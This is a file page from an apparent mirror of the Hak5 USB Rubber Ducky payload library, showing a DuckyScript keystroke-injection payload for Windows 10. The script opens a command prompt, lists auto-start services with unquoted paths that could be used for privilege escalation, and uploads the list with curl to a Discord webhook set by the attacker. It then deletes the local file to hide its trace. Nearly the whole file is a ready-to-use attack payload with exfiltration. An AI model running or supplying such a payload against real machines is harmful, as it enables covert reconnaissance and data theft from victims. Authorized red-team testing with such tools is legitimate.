hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
usbrubberducky-payloads/payloads/library/exfiltration/Priv-Paths/payload.txt

32 lines
832 B
Plaintext
Raw Permalink Blame History

REM Title: Priv-Paths
REM Author: atomiczsec
REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
REM Target: Windows 10
REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky
DEFINE #d YOUR-DISCORD-WEBHOOK
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 500
STRING cd %HOMEPATH%
ENTER
DELAY 1000
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
ENTER
DELAY 1000
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt"
SPACE
STRING #d
ENTER
DELAY 200
STRING del p.txt
ENTER
DELAY 100
STRING exit
ENTER
Reference in New Issue View Git Blame Copy Permalink